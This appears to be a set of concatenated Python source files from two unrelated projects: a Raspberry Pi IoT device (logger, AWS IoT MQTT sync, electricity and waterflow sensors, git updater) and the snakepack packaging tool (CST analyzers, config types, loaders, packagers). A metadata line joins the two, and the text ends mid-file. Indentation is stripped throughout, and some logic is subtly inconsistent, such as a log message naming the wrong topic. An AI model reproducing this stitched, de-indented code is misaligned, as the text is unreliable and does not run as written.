if self._dropped_screen_msg_count > 0:
self.output(cfg.logging_info,
'LOG',
f"Screen rate limiter dropped {self._dropped_screen_msg_count} messages in the last second")
self._dropped_screen_msg_count = 0
self._last_screen_rate_limiter_print = time.time()
def print_mqtt_rate_limiter(self):
"""
Prints the rate limiting messages
:return: None
"""
if self._dropped_mqtt_msg_count > 0:
self.output(cfg.logging_info,
'LOG',
f"MQTT rate limiter dropped {self._dropped_mqtt_msg_count} messages in the last second")
self._dropped_mqtt_msg_count = 0
self._last_mqtt_rate_limiter_print = time.time()
def display(self, msg: str):
"""
Prints the messages to screen
:param msg: the message to print
:return: none
"""
if self.print_to_screen:
# Check how long it has been since last message
now = time.time()
time_passed = now - self._last_screen_msg
# Update the time of the last message
self._last_screen_msg = now
# Update the allowance of messages to the screen, and cap it
self._allowance_screen += time_passed * float(self._screen_rate_limit)
if self._allowance_screen >= self._screen_rate_limit:
self._allowance_screen = self._screen_rate_limit
# Check if we can still print a message, if so, print it, else, drop it
if self._allowance_screen >= 1.0:
print(msg)
self._allowance_screen -= 1.0
else:
self._dropped_screen_msg_count += 1
def send_to_mqtt(self, level: int, sender: str, msg: str):
"""
        Sends the message to the MQTT log queue
:param level: level -> 0=error, 1=info, 2=debug
:param sender: sender
:param msg: message to send
:return: none
"""
# Check how long it has been since last message
now = time.time()
time_passed = now - self._last_mqtt_msg
# Update the time of the last message
self._last_mqtt_msg = now
# Update the allowance of messages to the screen, and cap it
self._allowance_mqtt += time_passed * float(self._mqtt_rate_limit)
if self._allowance_mqtt >= self._mqtt_rate_limit:
self._allowance_mqtt = self._mqtt_rate_limit
# Check if we can still print a message, if so, print it, else, drop it
if self._allowance_mqtt >= 1.0:
out_msg = {"level": cfg.logging_levels[level], "sender": sender, "message": msg}
self.outgoing_q.put({"log": json.dumps(out_msg)})
self._allowance_mqtt -= 1.0
else:
self._dropped_mqtt_msg_count += 1
def output(self, level: int, sender: str, msg: str):
if sender not in cfg.screen_logging_rejection_list and cfg.screen_logging_level > level:
self.display(self.create_output_line(level, sender, msg))
if sender not in cfg.mqtt_logging_rejection_list and cfg.mqtt_logging_level > level and sender != 'MQTT':
self.send_to_mqtt(level, sender, msg)
def run(self) -> None:
self.output(cfg.logging_info, "LOG", "Logger is live!")
while not self._stop_event.is_set():
try:
incoming_data: Dict = self.incoming_q.get_nowait()
for level, [sender, msg] in incoming_data.items():
self.output(level, sender, msg)
except queue.Empty:
self._stop_event.wait(timeout=0.01)
except Exception as e:
self.output(cfg.logging_error, "LOG", f"Error in run : {str(e)}")
if time.time() - self._last_screen_rate_limiter_print > 1.0:
self.print_screen_rate_limiter()
if time.time() - self._last_mqtt_rate_limiter_print > 1.0:
self.print_mqtt_rate_limiter()
while not self._incoming_q.empty():
try:
tmp = self._incoming_q.get_nowait()
except queue.Empty:
pass
        while not self._outgoing_q.empty():
try:
tmp = self._outgoing_q.get_nowait()
except queue.Empty:
pass
self._incoming_q.close()
self._outgoing_q.close()
self.output(cfg.logging_info,
'LOG',
"Quitting.")
```
#### File: src/platform_sync/__init__.py
```python
import time
from config import cfg
from src.database import DbManager
from threading import Thread, Event
from awscrt import io, mqtt, auth, http
from awsiot import mqtt_connection_builder
import json
import sys
import os
from typing import Dict
from src.log import logger
from queue import Queue
class CountData:
entered: bool = True
timestamp: int = 0
class StateData:
temperature: float = 15.0
class PlatformProcess(Thread):
def __init__(self, stop_event: Event, data_q: Queue, cmd_q: Queue, count_interval: float = 2, state_interval: float = 120):
self._stop_event = stop_event
# self._count_interval = count_interval
# self._state_interval = state_interval # not actually used yet
self._data_q: Queue = data_q
self._cmd_q: Queue = cmd_q
self._db_manager = DbManager()
self._connected = False
self._mqtt_connection = None
self._mqtt_connected = False
super().__init__()
def on_counting_message_received(self, topic, payload, **kwargs):
config_dict = json.loads(payload)
logger.info(f"[MQTT] counting received @ {topic} : {payload}")
n_max = config_dict['maxAllowed']
n_estimated = config_dict['actualCount']
self._data_q.put({'n_max': n_max, 'n_estimated': n_estimated})
def on_cmd_message_received(self, topic, payload, **kwargs):
config_dict = json.loads(payload)
logger.info(f"[MQTT] command received @ {topic} : {payload}")
cmd = config_dict['type']
if cmd == "UPLOAD":
self._cmd_q.put(cmd)
def send_state(self, data: StateData):
payload = json.dumps(data.__dict__)
logger.info(f"[MQTT] state to topic '{cfg.mqtt_state_topic}': {payload}")
self._mqtt_connection.publish(
topic=cfg.mqtt_state_topic,
payload=payload,
qos=mqtt.QoS.AT_LEAST_ONCE)
@staticmethod
def get_temperature() -> float:
platform = os.uname()
if platform[1] == "raspberrypi":
try:
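                # vcgencmd prints a line like "temp=48.3'C"; keep the part after '=' and
                # before the quote to obtain the temperature as a float.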
tmp: str = os.popen("/opt/vc/bin/vcgencmd measure_temp").readline()
tmp = tmp.split("=")[-1]
return float(tmp.split("'")[0])
except Exception as e:
logger.error(f"[MQTT][get_temperature] {e}")
else:
return 15.0
def run(self) -> None:
"""
TODO: Check if we can have longer keepalive on MQTT
:return:
"""
# Spin up mqtt resources
event_loop_group = io.EventLoopGroup(1)
host_resolver = io.DefaultHostResolver(event_loop_group)
client_bootstrap = io.ClientBootstrap(event_loop_group, host_resolver)
counter = 0
while not self._stop_event.is_set():
if not self._mqtt_connected:
while not cfg.has_device_id:
logger.info(f"[MQTT] No device_id set yet, sleeping for {cfg.eventSyncInterval} sec")
time.sleep(cfg.eventSyncInterval)
try:
self._mqtt_connection = mqtt_connection_builder.mtls_from_path(
endpoint=cfg.mqtt_endpoint,
cert_filepath=cfg.mqtt_crt_absolute_path,
pri_key_filepath=cfg.mqtt_key_absolute_path,
client_bootstrap=client_bootstrap,
ca_filepath=cfg.mqtt_root_pem_absolute_path,
on_connection_interrupted=on_connection_interrupted,
on_connection_resumed=on_connection_resumed,
client_id=cfg.deviceId,
clean_session=False,
keep_alive_secs=15)
connect_future = self._mqtt_connection.connect()
# Future.result() waits until a result is available
connect_future.result()
self._mqtt_connected = True
logger.info(f"[MQTT] Connected")
logger.info(f"[MQTT] Subscribing to config messages")
subscribe_future, packet_id = self._mqtt_connection.subscribe(
topic=cfg.mqtt_config_topic,
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=on_config_message_received)
subscribe_result = subscribe_future.result()
logger.info(f"[MQTT] subscribed to topic '{cfg.mqtt_state_topic}' : {str(subscribe_result['qos'])}")
except Exception as e:
# Log the error, sleep for a while, and go to the next loop
logger.error(f"[MQTT] error on connection or subscibtion occured : {e}")
time.sleep(cfg.eventSyncInterval)
continue
while not cfg.has_project_id:
logger.info(f"[MQTT] No project_id yet, sleeping for {cfg.eventSyncInterval} sec")
time.sleep(cfg.eventSyncInterval)
                # SUBSCRIBE TO COUNTING MESSAGES
try:
logger.info(f"[MQTT] Subscribing to counting messages")
subscribe_future, packet_id = self._mqtt_connection.subscribe(
topic=cfg.mqtt_count_topic,
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=self.on_counting_message_received)
subscribe_result = subscribe_future.result()
logger.info(f"[MQTT] subscribed to topic '{cfg.mqtt_count_topic}' : {str(subscribe_result['qos'])}")
except Exception as e:
logger.error(f"[MQTT] Error on subscription to counting : {e}")
                # SUBSCRIBE TO COMMAND MESSAGES
try:
logger.info(f"[MQTT] Subscribing to command topic")
subscribe_future, packet_id = self._mqtt_connection.subscribe(
topic=cfg.mqtt_cmd_topic,
qos=mqtt.QoS.AT_LEAST_ONCE,
callback=self.on_cmd_message_received)
subscribe_result = subscribe_future.result()
logger.info(f"[MQTT] subscribed to topic '{cfg.mqtt_cmd_topic}' : {str(subscribe_result['qos'])}")
except Exception as e:
logger.error(f"[MQTT] Error on subscription to command topic : {e}")
if self._mqtt_connected:
unsynced_data = self._db_manager.get_unsynced()
synced_ids = []
for unsynced_record in unsynced_data:
data = CountData()
data.entered = unsynced_record.entered
data.timestamp = unsynced_record.timestamp
message = json.dumps(data.__dict__)
logger.info(f"[MQTT] Publishing count to topic '{cfg.mqtt_event_topic}' : {message}")
self._mqtt_connection.publish(
topic=cfg.mqtt_event_topic,
payload=message,
qos=mqtt.QoS.AT_LEAST_ONCE)
synced_ids.append(unsynced_record.id)
self._db_manager.update_synced(synced_ids)
                # quick-and-dirty periodic state sync: send device state roughly every stateSyncInterval seconds
counter += 1
if counter >= int(cfg.stateSyncInterval / cfg.eventSyncInterval):
counter = 0
state_data = StateData()
state_data.temperature = self.get_temperature()
self.send_state(state_data)
time.sleep(cfg.eventSyncInterval)
logger.info(f"[MQTT] stopping thread")
# Callback when connection is accidentally lost.
def on_connection_interrupted(connection, error, **kwargs):
logger.info(f"[MQTT] Connection interrupted. error: {error}")
def on_config_message_received(topic, payload, **kwargs):
config_dict = json.loads(payload)
logger.info(f"[MQTT] Config received @ {topic} : {payload}")
cfg.update_config_with_dict(config_dict)
if 'deviceConfig' in config_dict.keys():
try:
if config_dict['deviceConfig']['pipeline'][0]['name'] == 'TELLY' and \
config_dict['deviceConfig']['pipeline'][0]['type'] == 'CONFIG':
logger.info(f"[MQTT] Saving new config")
cfg.update_config_with_dict(config_dict['deviceConfig']['pipeline'][0]['properties'])
except TypeError as e:
logger.error(f"[MQTT] New config : Received TypeError {e} -- This might be normal when no platform configuration has been set yet")
except Exception as e:
logger.error(f"[MQTT] New config : Received unknown exception {e}")
# Callback when an interrupted connection is re-established.
def on_connection_resumed(connection, return_code, session_present, **kwargs):
logger.info(f"[MQTT] Connection resumed. return code: {return_code}, session_present: {session_present}")
if return_code == mqtt.ConnectReturnCode.ACCEPTED and not session_present:
logger.info(f"[MQTT] Session did not persist, Resubscribing to topics...")
resubscribe_future, _ = connection.resubscribe_existing_topics()
# Cannot synchronously wait for resubscribe result because we're on the connection's event-loop thread,
# evaluate result with a callback instead.
resubscribe_future.add_done_callback(on_resubscribe_complete)
def on_resubscribe_complete(resubscribe_future):
resubscribe_results = resubscribe_future.result()
logger.info(f"[MQTT] Resubscribe results: {resubscribe_results}")
for topic, qos in resubscribe_results['topics']:
if qos is None:
sys.exit("Server rejected resubscribe to topic: {}".format(topic))
# Callback when the subscribed topic receives a message
def on_message_received(topic, payload, **kwargs):
logger.info(f"[MQTT] Received message on unknown topic {topic} : {payload}")
```
#### File: sensor/electricity/__init__.py
```python
import time
import json
from math import sqrt
from typing import List
from multiprocessing import Process, Event, Queue, Lock
from src.base import EdgiseBase
from grove.adc import ADC
from config import cfg
class ACSensor(Process, EdgiseBase):
def __init__(self, stop_event: Event, logging_q: Queue, input_q: Queue, output_q: Queue,
config_dict, resource_lock: Lock, **kwargs):
self._stop_event = stop_event
self._logging_q: Queue = logging_q
self._input_q: Queue = input_q
self._output_q: Queue = output_q
self.RMS_voltage = 230
self.VCC = 5
self._config_dict = config_dict
self._name = self._config_dict['name']
self.adc = ADC()
self.i2c_lock = resource_lock
Process.__init__(self)
EdgiseBase.__init__(self, name=self._name, logging_q=logging_q)
# config = {
# "name":str
# "PINNR":int,
# "SensorI bD":int,
# "Unit":"cm"
# "SensorType":""
# }
def read_sensor(self):
sensor_value = self.adc.read(self._config_dict['pin'])
return sensor_value
def amplitude_current(self, sensor_value):
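        # Convert the raw 10-bit ADC reading (0-1023 over VCC volts) to the current amplitude;
        # the /800 and *2000000 factors appear to be the original author's sensor calibration
        # (sampling resistor and current-transformer ratio), kept as-is here.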
return float(sensor_value / 1024 * self.VCC / 800 * 2000000)
def RMS_current(self, amplitude_current):
return amplitude_current / sqrt(2)
def avg_power_consumption(self, RMS_current):
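        # Approximate average power as the assumed fixed mains RMS voltage (230 V) times the RMS current.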
return self.RMS_voltage * RMS_current
def run(self) -> None:
self.info("Starting AC sensor")
print(self._config_dict['name'])
while not self._stop_event.is_set():
self.i2c_lock.acquire()
try:
raw_val = self.read_sensor()
finally:
self.i2c_lock.release()
self.info("Raw Value: {}".format(raw_val))
amplitude_current = self.amplitude_current(raw_val)
self.info("A I Value: {}".format(amplitude_current))
rms_current = self.RMS_current(amplitude_current)
self.info("RMS I Value: {}".format(rms_current))
avg_power = self.avg_power_consumption(rms_current)
self.info("AVG W Value: {}".format(avg_power))
data = {'electricitySensorData': {
'rawVal': raw_val,
'currentAmp': amplitude_current,
'rmsCurrent': rms_current,
'avgPower': avg_power
}}
measurement = {'data': data}
self._output_q.put_nowait({'event': json.dumps(measurement)})
time.sleep(10)
```
#### File: src/sensor/__init__.py
```python
from multiprocessing import Process, Event, Queue
from src.base import EdgiseBase
import abc
class Sensor(Process, EdgiseBase):
def __init__(self, stop_event: Event, logging_q: Queue, input_q: Queue, output_q: Queue, name: str, config: dict):
self._sensor_name: str = name
self._config:dict = config
self._logging_q: Queue = logging_q
self._input_q: Queue = input_q
self._output_q: Queue = output_q
Process.__init__(self, name=name)
EdgiseBase.__init__(self, name=name, logging_q=logging_q)
# config = {
# "PINNR":int,
# "SensorI bD":int,
# "Unit":"cm"
# "SensorType":""
# }
@abc.abstractmethod
def read_sensor(self):
pass
@abc.abstractmethod
def run(self) -> None:
pass
```
#### File: sensor/waterflow/__init__.py
```python
import json
from multiprocessing import Process, Event, Queue, Lock
from src.base import EdgiseBase
import RPi.GPIO as GPIO
import time
def count_sensor_pulse(sensor):
    # Mutate the sensor instance directly: the original tuple argument could not
    # propagate the incremented pulse count back to the WaterflowSensor instance.
    if sensor.start_counter:
        sensor.pulse_count += 1
class WaterflowSensor(Process, EdgiseBase):
def __init__(self, stop_event: Event, logging_q: Queue, output_q: Queue,
config_dict, **kwargs):
self._stop_event = stop_event
self._logging_q: Queue = logging_q
self._output_q: Queue = output_q
self._config_dict = config_dict
self._name = self._config_dict['name']
self.pulse_count = 0
self.start_counter = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(self._config_dict['Pin'], GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.add_event_detect(self._config_dict['Pin'], GPIO.FALLING,
                              callback=lambda channel: count_sensor_pulse(self))
Process.__init__(self)
EdgiseBase.__init__(self, name=self._name, logging_q=logging_q)
# config = {
# "PINNR":int,
# "SensorI bD":int,
# "Unit":"cm"
# "SensorType":""
# }
def run(self) -> None:
self.info("Starting Waterflow sensor")
while not self._stop_event.is_set():
self.start_counter = 1
time.sleep(1)
self.start_counter = 0
raw_val = self.pulse_count
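            # Pulses are counted over a 1 second window; the divisors below (6.6 and 396 = 6.6 * 60)
            # come from the original calibration constant and convert the pulse count to flow
            # per minute, per second and per hour respectively.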
flow_s = (raw_val / 396)
flow_min = (raw_val / 6.6)
flow_h = (raw_val * 60) / 6.6
self.pulse_count = 0
self.info("rawVal: {}".format(raw_val))
self.info("flowSec: {}".format(flow_s))
self.info("flowMin: {}".format(flow_min))
self.info("flowHour: {}".format(flow_h))
data = {'waterflowSensorData': {
'rawVal': raw_val,
'flowSec': flow_s,
'flowMin': flow_min,
'flowHour': flow_h
}}
measurement = {'data': data}
self._output_q.put_nowait({'event': json.dumps(measurement)})
time.sleep(10)
```
#### File: src/update/__init__.py
```python
import os
import subprocess
import time
from config import cfg
# from src.log import logger
from threading import Thread
import queue
from src.base import EdgiseBase
from multiprocessing import Queue, Event
class UpdateWatcher(Thread, EdgiseBase):
def __init__(self, stop_event: Event, cmd_q: Queue, logging_q: Queue):
self._stop_event = stop_event
self._cmd_q = cmd_q
Thread.__init__(self)
EdgiseBase.__init__(self, name="UPDATE", logging_q=logging_q)
def check_update(self):
# Initialization
branch = cfg.updateBranch
cmd_git_diff = ['/usr/bin/git', 'diff', '--name-only', f'{branch}', f'origin/{branch}']
cmd_git_pull = ['/usr/bin/git', 'pull']
cmd_git_fetch = ['/usr/bin/git', 'fetch', '--all']
cmd_git_branch = ['/usr/bin/git', 'branch']
cmd_git_deploy = ['/usr/bin/git', 'checkout', branch]
cmd_git_reset = ['/usr/bin/git', 'reset', '--hard']
output_git_diff = 0
# make sure we are on branch deploy
try:
os.chdir(cfg.root_dir)
subprocess.Popen(cmd_git_reset)
subprocess.Popen(cmd_git_fetch)
subprocess.Popen(cmd_git_deploy)
except Exception as e:
self.error(f'GIT reset/fetch/deploy error : {e}')
time.sleep(5)
# Check if update is necessary
try:
output_git_diff = subprocess.check_output(cmd_git_diff)
except Exception as e:
self.error(f'GIT diff error : {e}')
if len(output_git_diff) == 0:
self.info('Branch is up to date')
else:
self.info('Branch needs pull')
try:
output_git_pull = subprocess.check_output(cmd_git_pull)
self.info(output_git_pull)
self.error("Device updated, can be restarted")
except Exception as e:
self.error(f'GIT pull error : {e}')
def run(self) -> None:
while not self._stop_event.is_set():
time.sleep(0.1)
cmd = ""
try:
cmd = self._cmd_q.get_nowait()
except queue.Empty:
pass
if cmd == "UPDATE":
if cfg.updateBranch:
self.info("Update command received")
self.check_update()
else:
self.info(f"No update branch set, not updating")
self.info(f"Quitting.")
``` |
{
"source": "jochenvdv/snakepack",
"score": 2
} |
#### File: analyzers/python/_base.py
```python
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Union, Mapping, Iterable, Optional
from boltons.iterutils import flatten
from libcst import MetadataWrapper
from snakepack.analyzers import Analyzer
from snakepack.analyzers._base import SubjectAnalyzer
from snakepack.assets import Asset, AssetGroup
from snakepack.assets.python import PythonModule
class PythonModuleCstAnalyzer(SubjectAnalyzer, ABC):
@abstractmethod
def analyse_subject(self, subject: Union[Asset, AssetGroup]) -> Analysis:
raise NotImplementedError
CST_PROVIDERS = set()
def create_analysis(
self,
metadata: Mapping[PythonModule, MetadataWrapper]
) -> PythonModuleCstAnalyzer.Analysis:
return self.Analysis(metadata=metadata)
class Analysis(Analyzer.Analysis):
def __init__(self, metadata: MetadataWrapper):
self._metadata = metadata
def __getitem__(self, item):
return self._metadata[item]
__config_name__ = NotImplemented
class BatchPythonModuleCstAnalyzer(SubjectAnalyzer):
def __init__(self, analyzers: Iterable[PythonModuleCstAnalyzer]):
self._analyzers = analyzers
def analyse_subject(self, subject) -> Mapping[PythonModuleCstAnalyzer, PythonModuleCstAnalyzer.Analysis]:
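        # Resolve the union of all analyzers' metadata providers in a single pass over the
        # module's CST, then hand the shared metadata to each analyzer to build its analysis.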
providers = set(flatten(map(lambda x: x.CST_PROVIDERS, self._analyzers)))
modules_metadata = subject.content.metadata_wrapper.resolve_many(providers)
analyses = {}
for analyzer in self._analyzers:
analysis = analyzer.create_analysis(modules_metadata)
analyses[analyzer.__class__] = analysis
return analyses
```
#### File: analyzers/python/literals.py
```python
from __future__ import annotations
import functools
from typing import Union, Optional, Tuple, Dict, Iterable, Sequence, List, Set
from boltons.iterutils import first, flatten
from libcst import MetadataWrapper, Assign, AnnAssign, SimpleString, VisitorMetadataProvider, AugAssign, Name, \
BaseExpression, ConcatenatedString, CSTNode
from libcst.metadata import ScopeProvider, ExpressionContextProvider, ParentNodeProvider, Scope, GlobalScope
from snakepack.analyzers import Analyzer
from snakepack.analyzers.python import PythonModuleCstAnalyzer
from snakepack.assets import Asset, AssetGroup
from snakepack.assets.python import PythonModule, PythonModuleCst
class LiteralDuplicationAnalyzer(PythonModuleCstAnalyzer):
def analyse_subject(self, subject: Union[Asset, AssetGroup]) -> LiteralDuplicationAnalyzer.Analysis:
if isinstance(subject, PythonModule):
metadata = subject.content.metadata_wrapper.resolve_many(self.CST_PROVIDERS)
return self.create_analysis(metadata)
else:
raise NotImplementedError
class Analysis(PythonModuleCstAnalyzer.Analysis):
@functools.lru_cache()
def get_occurrences(self, literal_node: SimpleString) -> Optional[int]:
if literal_node not in self._metadata[LiteralDuplicationAnalyzer._LiteralDuplicationCountProvider]:
return None
return self._metadata[LiteralDuplicationAnalyzer._LiteralDuplicationCountProvider][literal_node]
@functools.lru_cache()
def is_part_of_concatenated_string(self, literal_node: SimpleString) -> bool:
return isinstance(self._metadata[ParentNodeProvider][literal_node], ConcatenatedString)
@functools.lru_cache()
def get_preceding_assignments(
self,
literal_node: SimpleString,
scope: Scope
) -> Dict[str, Sequence[Union[Assign, AnnAssign, AugAssign]]]:
for literal, assignments in self._metadata[LiteralDuplicationAnalyzer._LiteralAssignmentProvider].items():
if literal_node.value == literal.value:
return {
key: value
for key, value in assignments.items()
if key in scope
}
return None
class _LiteralDuplicationCountProvider(VisitorMetadataProvider[int]):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._literal_counts: Dict[str, Tuple[int, List[SimpleString]]] = {}
def visit_SimpleString(self, node: SimpleString) -> Optional[bool]:
if node.value not in self._literal_counts:
self._literal_counts[node.value] = (0, [])
self._literal_counts[node.value] = (self._literal_counts[node.value][0] + 1, self._literal_counts[node.value][1])
self._literal_counts[node.value][1].append(node)
for duplicated_node in self._literal_counts[node.value][1]:
self.set_metadata(duplicated_node, self._literal_counts[node.value][1])
class _LiteralAssignmentProvider(
VisitorMetadataProvider[
Dict[
str,
Sequence[
Union[Assign, AnnAssign, AugAssign]
]
]
]):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._literal_assignments: Dict[str, Dict[str, List[Union[Assign, AnnAssign, AugAssign]]]] = {}
self._literals_referenced: Set[str] = set()
def visit_SimpleString(self, node: SimpleString) -> Optional[bool]:
self._literals_referenced.add(node.value)
def visit_Assign(self, node: Assign) -> Optional[bool]:
if isinstance(node.value, SimpleString):
for target in node.targets:
if isinstance(target.target, Name):
self._track_assignment_for_literal(node.value, target.target, node)
self._invalidate_previous_assignments(target.target, node.value, node)
def visit_AnnAssign(self, node: AnnAssign) -> Optional[bool]:
if isinstance(node.value, SimpleString) and isinstance(node.target, Name):
self._track_assignment_for_literal(node.value, node.target, node)
self._invalidate_previous_assignments(node.target, node.value, node)
def visit_AugAssign(self, node: AugAssign) -> Optional[bool]:
if isinstance(node.value, SimpleString) and isinstance(node.target, Name):
self._track_assignment_for_literal(node.value, node.target, node)
self._invalidate_previous_assignments(node.target, node.value, node)
def _track_assignment_for_literal(self, literal: SimpleString, name: Name, node: Union[Assign, AnnAssign, AugAssign]):
if literal.value in self._literals_referenced:
# don't track assignment as it follows after a reference
return
if literal.value not in self._literal_assignments:
self._literal_assignments[literal.value] = {}
if name not in self._literal_assignments[literal.value]:
self._literal_assignments[literal.value][name.value] = []
self._literal_assignments[literal.value][name.value].append(node)
self.set_metadata(literal, self._literal_assignments[literal.value])
def _invalidate_previous_assignments(self, name: Name, value: BaseExpression, node: Union[Assign, AnnAssign, AugAssign]):
# invalidate literal assignments if their identifier is assigned to again
invalidate = False
for literal_value, assignments in self._literal_assignments.items():
if name.value in assignments:
if (isinstance(node, AugAssign) or (isinstance(node, (Assign, AnnAssign)) and
(not isinstance(value, SimpleString) or value.value != literal_value))):
# invalidate because re-assignment to identifier with another value
del self._literal_assignments[literal_value][name.value]
CST_PROVIDERS = {
ParentNodeProvider,
_LiteralDuplicationCountProvider,
_LiteralAssignmentProvider
}
__config_name__ = 'literal_duplication'
```
#### File: snakepack/bundlers/_base.py
```python
from __future__ import annotations
from abc import ABC, abstractmethod
from typing import Iterable, Sequence, Optional
from snakepack.assets import Asset, AssetGroup
from snakepack.config.options import ConfigurableComponent
from snakepack.loaders import Loader
from snakepack.transformers import Transformer
class Bundle:
def __init__(self, name: str, bundler: Bundler, loader: Loader, transformers: Sequence[Transformer]):
self._name = name
self._bundler = bundler
self._loader = loader
self._asset_group: Optional[AssetGroup] = None
self._transformers = transformers
@property
def name(self) -> str:
return self._name
@property
def bundler(self) -> Bundler:
return self._bundler
@property
def loader(self) -> Loader:
return self._loader
@property
def asset_group(self) -> AssetGroup:
return self._asset_group
@property
def transformers(self) -> Sequence[Transformer]:
return self._transformers
def load(self):
self._asset_group = self._loader.load()
def bundle(self, *args, **kwargs):
return self._bundler.bundle(self, *args, **kwargs)
class Bundler(ConfigurableComponent, ABC):
@abstractmethod
def bundle(self, bundle: Bundle, package):
raise NotImplementedError
```
#### File: snakepack/config/formats.py
```python
from pathlib import Path, PosixPath, WindowsPath, PurePath
import yaml
from yaml import YAMLError
from snakepack.config import ConfigException
from snakepack.config.model import SnakepackConfig
from snakepack.config.types import PythonVersion, FullyQualifiedPythonName
def path_to_yaml(dumper, data):
return dumper.represent_data(str(data))
def pythonversion_to_yaml(dumper, data):
return dumper.represent_data(data.value)
def fqpn_to_yaml(dumper, data):
return dumper.represent_data(str(data))
yaml.add_representer(PosixPath, path_to_yaml)
yaml.add_representer(WindowsPath, path_to_yaml)
yaml.add_representer(PythonVersion, pythonversion_to_yaml)
yaml.add_representer(FullyQualifiedPythonName, fqpn_to_yaml)
def parse_yaml_config(config: str) -> SnakepackConfig:
try:
config_dict = yaml.safe_load(config)
except YAMLError as e:
raise ConfigException('Configuration contains invalid YAML')
return SnakepackConfig(**config_dict)
def generate_yaml_config(config: SnakepackConfig) -> str:
config_dict = config.dict()
yaml_config = yaml.dump(config_dict)
return yaml_config
```
#### File: snakepack/config/types.py
```python
from __future__ import annotations
import re
import sys
from abc import ABC
from enum import Enum, unique
from typing import Sequence, Optional, Match, Union
class Selector(ABC, str):
REGEX = NotImplemented
_selector_types = set()
@classmethod
def __init_subclass__(cls, **kwargs):
Selector._selector_types.add(cls)
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(cls, value):
for selector_type in cls._selector_types:
if selector_type.REGEX.fullmatch(value):
return selector_type(value)
raise ValueError(f"Invalid selector '{value}'")
@unique
class PythonVersion(Enum):
PYTHON_37 = '3.7'
PYTHON_38 = '3.8'
PYTHON_39 = '3.9'
PYTHON_310 = '3.10'
@classmethod
def current(cls) -> PythonVersion:
return PythonVersion(f'{sys.version_info[0]}.{sys.version_info[1]}')
class FullyQualifiedPythonName(Selector):
_MODULE_NAME_REGEX = r'([a-zA-Z0-9_]+)(\.[a-zA-Z0-9_]+)*'
_IDENTIFIER_NAME_REGEX = r'([a-zA-Z_][a-zA-Z0-9_]*)(\.[a-zA-Z_][a-zA-Z0-9_]*)*'
REGEX = re.compile(
rf'^(?P<module_path>{_MODULE_NAME_REGEX})(:(?P<ident_path>{_IDENTIFIER_NAME_REGEX}))?$'
)
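    # Accepted form: a dotted module path with an optional ':'-separated identifier path,
    # e.g. 'package.module:Class.method' (example value, not taken from the codebase).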
def __new__(cls, value: Union[str, Match]):
match = cls.REGEX.fullmatch(value)
if not match:
raise ValueError('Invalid fully qualified python name')
module_path = match.group('module_path')
ident_path = match.group('ident_path')
mod_path_elems = []
if module_path is not None:
mod_path_elems.extend(module_path.split('.'))
id_path_elems = []
if ident_path is not None:
id_path_elems.extend(ident_path.split('.'))
obj = str.__new__(cls, value)
obj._module_path = mod_path_elems
obj._ident_path = id_path_elems
return obj
@property
def module_path(self) -> Sequence[str]:
return list(self._module_path)
@property
def ident_path(self) -> Sequence[str]:
return list(self._ident_path)
@property
def has_module_path(self) -> bool:
return len(self._module_path) > 0
@property
def has_ident_path(self) -> bool:
return len(self._ident_path) > 0
@classmethod
def __get_validators__(cls):
yield cls.validate
@classmethod
def validate(cls, value):
return cls(value)
```
#### File: snakepack/loaders/generic.py
```python
from pathlib import Path
from typing import Sequence
from snakepack.assets import AssetGroup
from snakepack.assets._base import GenericAssetGroup, FileContentSource
from snakepack.assets.generic import StaticFile
from snakepack.config.options import Options
from snakepack.loaders import Loader
class StaticFileLoader(Loader):
def load(self) -> GenericAssetGroup:
assets = []
for path in self._options.paths:
asset = StaticFile.from_source(
name=path,
target_path=path,
source=FileContentSource(path=path)
)
assets.append(asset)
return GenericAssetGroup(assets=assets)
class Options(Options):
paths: Sequence[Path] = []
__all__ = [
StaticFileLoader
]
```
#### File: snakepack/packagers/_base.py
```python
from __future__ import annotations
from abc import abstractmethod, ABC
from pathlib import Path
from typing import Iterable, Dict, Optional
from snakepack.bundlers import Bundle
from snakepack.config.options import Options, ConfigurableComponent
class Package:
def __init__(self, name: str, packager: Packager, bundles: Iterable[Bundle]):
self._name = name
self._packager = packager
self._bundles = {bundle.name: bundle for bundle in bundles}
@property
def name(self):
return self._name
@property
def bundles(self) -> Dict[str, Bundle]:
return self._bundles
@property
def packager(self) -> Packager:
return self._packager
@property
def target_path(self) -> Path:
return self._packager.get_target_path(self)
def package(self):
return self._packager.package(self)
class Packager(ConfigurableComponent, ABC):
@abstractmethod
def package(self, package: Package):
raise NotImplementedError
@abstractmethod
def get_target_path(self, package: Package) -> Path:
raise NotImplementedError
```
#### File: snakepack/packagers/generic.py
```python
from __future__ import annotations
from pathlib import Path
from snakepack.config.options import Options
from snakepack.packagers import Packager, Package
class DirectoryPackager(Packager):
def get_target_path(self, package: Package) -> Path:
return self._global_options.target_base_path / Path(self._options.output_path.format(package_name=package.name))
def package(self, package: Package):
output_path = self.get_target_path(package)
output_path.mkdir(parents=True, exist_ok=True)
for bundle in package.bundles.values():
bundle.bundle(package=package)
class Options(Options):
output_path: str = '{package_name}'
__config_name__ = 'directory'
__all__ = [
DirectoryPackager
]
```
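A hypothetical sketch of how `DirectoryPackager` resolves its target directory; `global_options` and `package` are placeholders for a configured `GlobalOptions` (with `target_base_path=Path('dist')`) and a `Package` named `'snakepack'`, neither of which is constructed here:
```python
packager = DirectoryPackager(
    global_options=global_options,  # assumed: global_options.target_base_path == Path('dist')
    options=DirectoryPackager.Options(output_path='{package_name}'),
)
# the '{package_name}' template is formatted with package.name and joined to target_base_path
print(packager.get_target_path(package))  # -> dist/snakepack (for package.name == 'snakepack')
```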
#### File: snakepack/transformers/_base.py
```python
from abc import ABC, abstractmethod
from typing import Type, Mapping, Union
from snakepack.analyzers import Analyzer
from snakepack.assets import Asset, AssetContent, AssetGroup
from snakepack.config.options import ConfigurableComponent
class Transformer(ConfigurableComponent, ABC):
REQUIRED_ANALYZERS = []
@abstractmethod
def transform(
self,
analyses: Mapping[Type[Analyzer], Analyzer.Analysis],
subject: Union[Asset, AssetGroup]
) -> Union[Asset, AssetGroup]:
raise NotImplementedError
```
#### File: transformers/python/remove_comments.py
```python
from typing import Optional, Union
from libcst import CSTTransformer, Comment, RemovalSentinel
